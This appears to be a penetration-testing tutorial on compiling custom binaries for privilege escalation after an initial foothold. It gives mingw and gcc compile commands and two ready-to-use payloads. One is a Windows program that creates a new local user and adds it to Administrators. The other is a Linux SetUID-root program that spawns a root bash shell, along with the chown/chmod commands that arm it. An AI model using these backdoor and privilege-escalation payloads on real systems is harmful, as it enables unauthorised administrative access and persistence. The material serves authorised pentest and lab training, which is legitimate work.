Compiling Custom Binaries

I created this post to address situations wherein a direct msfvenom reverse shell may be cumbersome to use. These binaries will provide other ways to obtain an escalated shell after an initial foothold.

Additionally, these privilege escalation paths should make it easier to reexploit compared to juggling listeners and reverse shells.

Dependencies and Compiling

These binaries will be compiled on a Kali system - this should work on other Debian-based distributions like Ubuntu provided the packages are available.

sudo apt install gcc mingw-w64

Generally compiling with follow the following patterns but may vary depending on the imported libraries.

1. Windows

    i686-w64-mingw32-gcc code.c -l ws2_32 -o code.exe
   

   Base code:

    #include <stdio.h>
    #include <stdlib.h>
   
    int main(void){
         system("whoami");
         return 0;
         }
   

2. Linux

    gcc code.c -o code
   

   Base code:

    #include <stdio.h>
    #include <stdlib.h>
   
    int main(void){
        system("whoami");
    }
   

Useful Examples

Windows - Add New User to Administrators group

Have this binary be executed with escalated priviliges.

#include <stdio.h>
#include <stdlib.h>

int main(void){
     system("net user username password /add");
     system("net localgroup Administrators username /add");
     return 0;
     }

Linux - Elevate Bash Shell

The binary needs to have the SetUID bit and be owned by root to have it be executed with escalated privileges. This can be done using the following snippet:

chown root.root /tmp/rootme; chmod +sx /tmp/rootme

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main(void){
	setuid(0); setgid(0); system("/bin/bash");
}